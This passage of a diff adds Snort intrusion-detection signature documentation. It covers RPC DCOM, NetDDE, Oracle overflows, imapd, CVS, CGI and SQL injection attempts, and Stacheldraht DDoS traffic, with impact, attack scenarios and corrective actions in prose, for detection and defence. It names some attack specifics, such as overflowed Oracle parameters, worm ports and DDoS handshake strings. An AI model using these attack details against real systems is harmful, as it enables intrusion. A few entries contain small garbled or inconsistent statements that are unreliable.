+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1494.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1494
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1685.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1685
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2491.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+2491
+
+--
+Summary:
+This rule no longer generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+This rule now uses flowbits and can be set to generate an event by
+modifying the rule slightly to remove the "flowbits:no_alert;" option.
+When traffic is detected that attempts to bind to the ISystemActivator
+object in MS RPC DCOM communications this rule now activates sids 2351
+and 2352 to detect exploits against this service. Cool huh?
+
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+This vulnerability is also exploited by the Billy/Blaster worm. The worm
+also uses the Trivial File Transfer Protocol (TFTP) to propagate. A 
+number of events generated by this rule may indicate worm activity.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists. This is also exploited by a worm.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+Block access to port 69 used by the worm to propogate.
+
+Block access to port 4444 used by the worm.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft:
+http://www.microsoft.com/technet/security/bulletin/MS03-026.asp
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0352
+
+Symantec:
+http://securityresponse.symantec.com/avcenter/venc/data/w32.blaster.worm.html
+
+--
--- /dev/null
+++ b/doc/signatures/857.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+857
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1109.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1109
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2957.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2957
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
+++ b/doc/signatures/1755.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+1755
+
+--
+Summary:
+This event is generated when a remote authenticated user sends a malformed request for partial mailbox attributes to an internal IMAP server, indicating an attempt to exploit a buffer overflow vulnerability in some versions of IMAP.
+
+--
+Impact:
+Remote execution of arbitrary code, possible denial of service. The attacker must have a valid IMAP account to attempt this exploit.
+
+--
+Detailed Information:
+Versions of University of Washington imapd that are compiled with RFC 1730 support contain a vulnerability where an authenticated user can send a malformed request for partial mailbox attributes to the IMAP server, causing a buffer overflow condition. The attacker can then run arbitrary code on the server or crash the server completely.    
+
+--
+Affected Systems:
+Any operating system running University of Washington imapd compiled with RFC 1730 support, which includes the following versions of University of Washington imapd:
+2000.0
+2000.0a
+2000.0b
+2000.0c
+2001.0
+2001.0a
+
+--
+Attack Scenarios:
+An attacker with a valid user account sends a malformed request for partial mailbox attributes, causing a buffer overflow condition. The attacker can then execute arbitrary code on the server or can crash the mail server.
+
+--
+Ease of Attack:
+Simple. Exploits exist, but the attacker must have a valid account on the IMAP server.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade University of Washington imapd to 2002.0 or higher, or apply the patch for your current version of UW IMAP appropriate to your operating system. The University of Washington has provided patches that address this vulnerability, and affected operating system vendors have distributed patches for their specific implementations of UW IMAP.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Sourcefire Technical Publications Team
+Jen Harvey <jennifer.harvey@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1498.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1498
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3281.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3281
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1403.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1403
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+Viewcode can be used to vew the source code for your server's asp files.
+These files could contain login names and other sensitive information.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Ricky McAtee <rmcatee@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3452.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3452
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2631.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2631
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in database
+replication. The "refresh_mview_repgroup" procedure contains a
+programming error that may allow an attacker to execute a buffer
+overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "gowner" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck90.html
+
+--
--- /dev/null
+++ b/doc/signatures/2583.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2583
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a vulnerability
+associated with CVS.
+
+--
+Impact:
+A successful attack may perform a buffer overflow or a denial of service by
+either causing the CVS server to terminate abruptly or causing an exhaustion of
+disk resources.
+
+--
+Detailed Information:
+A CVS client transaction may reference a file using a relative path
+requiring the use of a directory traversal.  The Max-dotdot keyword and
+appropriate argument are created by the CVS client software to handle
+relative paths.  The appropriate argument represents the maximum number of
+directory levels to be traversed.  It is possible for an attacker
+to supply an overly large value to the Max-dotdot keyword, causing an
+incorrect allocation of memory and possibly causing a buffer overflow or the CVS
+server to crash.  In addition, temporary files are not deleted enabling a disk
+resource exhaustion attack, if repeated many times.  It should be noted
+that an attacker must have CVS access privileges in order to attempt
+these attacks.
+
+
+--
+Affected Systems:
+CVS versions 1.12.8 with the exception of version 1.11.17
+
+--
+Attack Scenarios:
+An attacker can connect to a CVS server and craft an overly large Max-dotdot
+argument value, causing a buffer overflow or causing the vulnerable CVS server
+to crash.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0417
+
+Bugtraq:
+http://www.securityfocus.com/bid/10499
+
+
+--
--- /dev/null
+++ b/doc/signatures/2854.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2854
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure generate_snapshot_support
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/545.txt
@@ -0,0 +1,57 @@
+Rule:  
+
+--
+Sid: 
+545
+
+--
+Summary: 
+This event is generated when an attempt is made to navigate in an FTP sessions to a hidden directory named "/ ".
+
+--
+Impact: 
+Unauthorized file storage.  An attacker may attempt to navigate on an FTP server to the "/ " directory to list or store unauthorized files such as unlicensed software.
+
+--
+Detailed Information: 
+An attacker may attempt to hide unauthorized files in a hidden directory named "/ ".   This hidden directory is hard to discover, permitting attackers to store unauthorized "warez" files, such as unlicensed or pirated software. 
+
+--
+Affected Systems: 
+FTP servers
+
+--
+Attack Scenarios: 
+An attacker may navigate to the hidden directory named "/ " to list or store unauthorized files.
+
+--
+Ease of Attack: 
+Simple.
+
+--
+False Positives: 
+It is remotely possible that an authorized directory exists named "/ ".
+
+--
+False Negatives: 
+Hidden directories other than those named "/ " may be used to store "warez" files.
+
+--
+Corrective Action: 
+Assign restrictive permissions to all directories so unauthorized users cannot navigate or write to them.
+
+Regularly monitor directories for sudden or drastic increased use of space.
+
+--
+Contributors: 
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2018.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2018
+
+--
+Summary:
+This event is generated when a request is made to list remotely mounted Network File System (NFS) directories. 
+
+--
+Impact:
+Information disclosure.  This can allow an attacker to discover NFS file systems that have been mounted.
+
+--
+Detailed Information:
+The mountd Remote Procedure Call (RPC) implements the NFS mount protocol.  When an NFS client requests a mount of an NFS file system, mountd examines the list of exported file systems.  If the NFS client is permitted access to the requested file system, mountd returns a file handle for the requested directory.  An attacker or legitimate NFS client may request a list of mounted file systems.
+
+--
+Affected Systems:
+All systems running NFS.
+
+--
+Attack Scenarios:
+An attacker may attempt to list the mounted NFS file systems as a precursor to mounting them to read or change a specific file. 
+
+--
+Ease of Attack:
+Simple.   
+
+--
+False Positives:
+If a legitimate remote user is allowed to list mounted NFS file systems, this rule may trigger.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines. 
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/1615.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1615
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1856.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid:
+1856
+
+--
+Summary:
+This event is generated when activity indicating the presence of a
+variant of the Stacheldraht DDOS tool is detected.
+
+--
+Impact:
+Distributed Denial of Service (DDoS) is possible.
+
+--
+Detailed Information:
+Stracheldraht is a Distributed denial of service tool normally found on
+Sun Solaris machines. It is made up of a Client, handler and agent. The
+clients connects to the handler. Handlers can connect with up to 1000
+agents. Communication between the client and the handler is conducted
+using tcp and the communication between the handler and the agent can be
+either tcp or icmp_echoreply. This rule detects the message sent from
+the handler to the agent. This message is used to respond to a agent
+message "skillz". The handler will reply with the string "ficken". This
+traffic differs from the traffic described on
+http://staff.washington.edu/dittrich/misc/stacheldraht.analysis because
+the packets have an icmp id of 6667 rather than 667 as noted in the analysis.
+
+--
+Affected Systems:
+	Sun Solaris
+
+--
+Attack Scenarios:
+The agent can be used to mount a distributed denial of service attack. It
+also indicates that a machine is compromised.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+The icmp id along with the keywords may be changed in the
+source code which would then evade this rule.
+
+--
+Corrective Action:
+Disconnect power from the machine and perform forensic analysis on the
+hard drives.
+
+--
+Contributors:
+Snort documentation contributed by Ian Macdonald
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2022.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2022
+
+--
+Summary:
+The RPC service mountd enables clients to connect to networked file 
+machine being dismounted via TCP.
+
+--
+Impact:
+Denial of network resources to users on the local area network.
+
+--
+Detailed Information:
+This may be an attempt to deny access to network resources from an 
+unauthorized source. It may also be indicative of an attacker probing 
+for RPC services on a host in an attempt to discover a possible entry 
+point to network resources via a vulnerable daemon.
+
+--
+Affected Systems:
+All systems allowing network shares to be unmounted by anonymous hosts, 
+all systems allowing RPC services to be stopped by ordinary users and 
+systems already compromised by an attacker via another vulnerability.
+
+--
+Attack Scenarios:
+This is an intelligence gathering activity, the attacker could remotely 
+unmount a shared resource to deny a resource to the local area network 
+or a probe to discover possible routes of entry into a system.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+When allowing hosts to mount an external network share, consider using a
+hosts.allow file.
+
+Do not allow shares to be unmounted by unauthorized hosts or users.
+
+RPC services should not be available outside the local area network, 
+filter RPC ports at the firewall to ensure access is denied to RPC 
+enabled machines.
+
+RPC services should also be disabled where not needed.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000860.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000860
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Francisco Charrua Photo-Gallery" application running on a webserver. Access to the file "room.php" with SQL commands being passed as the "id" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "id" parameter in the "room.php" script used by the "Francisco Charrua Photo-Gallery" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Francisco Charrua Photo-Gallery
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
